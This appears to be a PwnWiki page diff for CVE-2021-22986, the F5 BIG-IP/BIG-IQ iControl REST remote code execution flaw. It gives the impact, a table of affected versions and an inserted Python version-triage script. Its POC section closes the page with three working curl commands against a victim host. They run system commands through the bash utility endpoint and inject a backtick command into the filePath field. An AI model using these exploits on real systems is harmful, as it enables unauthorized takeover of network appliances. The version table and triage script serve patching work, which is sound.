Difference between revisions of "CVE-2021-22986 F5 BIG-IP iControl RCE Vulnerability"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞危害== </translate> <translate> *執行任意系統命令 *創建或刪除文件 *禁用服務 </translate> <translate> ==影響版...") |
|||
| (One intermediate revision by the same user not shown) | |||
| Line 2: | Line 2: | ||
<translate> | <translate> | ||
| − | ==漏洞危害== | + | ==漏洞危害== <!--T:1--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
*執行任意系統命令 | *執行任意系統命令 | ||
*創建或刪除文件 | *創建或刪除文件 | ||
| Line 12: | Line 13: | ||
<translate> | <translate> | ||
| − | ==影響版本== | + | ==影響版本== <!--T:3--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 27: | Line 28: | ||
==POC== | ==POC== | ||
| + | 1. | ||
<pre> | <pre> | ||
curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}' | curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}' | ||
| + | </pre> | ||
| + | 2. | ||
| + | <pre> | ||
| + | curl -ks https://[victimIP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"`id`"}' | ||
| + | </pre> | ||
| + | 3. | ||
| + | <pre> | ||
| + | curl -ksu admin:[redacted] https://[vimtimIP]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}' | ||
</pre> | </pre> | ||
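Review bot: the placeholder in the new item 3 is spelled [vimtimIP], while item 1 and the new item 2 use [victimIP]; use one spelling so all three entries read consistently. The new "1.", "2." and "3." labels and the ==POC== heading also sit outside any <translate> block in the visible lines, unlike the headings tagged with <!--T:n--> markers in the earlier hunks, so they will not be picked up as translation units.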
Latest revision as of 17:31, 18 March 2021
Vulnerability impact
- Execute arbitrary system commands
- Create or delete files
- Disable services
Affected versions

| Product | Branch | Vulnerable versions | Fixed in |
|---|---|---|---|
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) | 16.x | 16.0.0 – 16.0.1 | 16.0.1.1 |
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) | 15.x | 15.1.0 – 15.1.2 | 15.1.2.1 |
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) | 14.x | 14.1.0 – 14.1.3 | 14.1.4 |
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) | 13.x | 13.1.0 – 13.1.3 | 13.1.3.6 |
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) | 12.x | 12.1.0 – 12.1.5 | 12.1.5.3* |
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) | 11.x | None | Not applicable |
| BIG-IQ Centralized Management | 8.x | None | 8.0.0 |
| BIG-IQ Centralized Management | 7.x | 7.1.0, 7.0.0 | 7.1.0.3, 7.0.0.2 |
| BIG-IQ Centralized Management | 6.x | 6.0.0 – 6.1.0 | None |
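For patch triage, the affected-versions data above can be checked against a device inventory. The following is an added example, not part of the original wiki page or any F5 tooling; the inventory hostnames and versions are constructed, and it assumes that a point release inside a listed range but below the fixed release is still vulnerable.

```python
# Rows are (product, first vulnerable, last vulnerable, fixed release or None),
# copied from the affected-versions data on this page. The page's asterisk on
# 12.1.5.3 is not interpreted here.
ROWS = [
    ("BIG-IP", "16.0.0", "16.0.1", "16.0.1.1"),
    ("BIG-IP", "15.1.0", "15.1.2", "15.1.2.1"),
    ("BIG-IP", "14.1.0", "14.1.3", "14.1.4"),
    ("BIG-IP", "13.1.0", "13.1.3", "13.1.3.6"),
    ("BIG-IP", "12.1.0", "12.1.5", "12.1.5.3"),
    ("BIG-IQ", "7.1.0", "7.1.0", "7.1.0.3"),
    ("BIG-IQ", "7.0.0", "7.0.0", "7.0.0.2"),
    ("BIG-IQ", "6.0.0", "6.1.0", None),  # no fixed release listed for 6.x
]

def parse(version):
    """'14.1.3.1' -> (14, 1, 3, 1), padded to at least three components."""
    parts = tuple(int(p) for p in version.strip().split("."))
    return parts + (0,) * (3 - len(parts))

def triage(product, version):
    """Return (vulnerable, fixed_release) for one device.

    Assumption: a point release inside a listed range but below the fixed
    release (for example 14.1.3.1) is treated as vulnerable.
    """
    v = parse(version)
    for prod, first, last, fixed in ROWS:
        if prod != product:
            continue
        lo, hi = parse(first), parse(last)
        in_range = lo <= v[:len(hi)] <= hi
        if in_range and (fixed is None or v < parse(fixed)):
            return True, fixed
    return False, None

def report(inventory):
    """Map each (host, product, version) to a short action string."""
    out = []
    for host, product, version in inventory:
        vulnerable, fixed = triage(product, version)
        if not vulnerable:
            action = "not in a listed vulnerable range"
        elif fixed:
            action = "upgrade to " + fixed + " or later"
        else:
            action = "no fixed release listed for this branch"
        out.append((host, action))
    return out

# Constructed inventory: hostnames and versions are made up for the example.
INVENTORY = [("lb-edge-01", "BIG-IP", "16.0.1"), ("lb-core-02", "BIG-IP", "14.1.4"),
             ("mgmt-iq-01", "BIG-IQ", "6.1.0")]
```
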
POC
1.
<pre>
curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'
</pre>
2.
<pre>
curl -ks https://[victimIP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"`id`"}'
</pre>
3.
<pre>
curl -ksu admin:[redacted] https://[victimIP]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}'
</pre>